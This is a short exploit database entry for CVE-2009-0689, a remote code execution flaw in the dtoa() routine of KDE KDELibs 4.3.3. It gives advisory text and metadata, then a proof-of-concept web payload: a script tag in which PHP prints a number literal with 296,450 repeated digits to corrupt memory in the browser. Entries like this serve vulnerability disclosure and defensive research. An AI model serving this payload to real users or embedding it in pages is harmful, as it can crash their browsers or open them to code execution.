KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution

Author: Maksymilian Arciemowicz
type: remote
platform: linux
port: 
date_added: 2009-11-20 
date_updated: 2014-05-15 
verified: 1 
codes: CVE-2009-0689;OSVDB-61187 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/37080/info

KDE is prone to a remote code-execution vulnerability that affects KDELibs.

Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.

NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

This issue affects KDE KDELibs 4.3.3; other versions may also be affected.

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>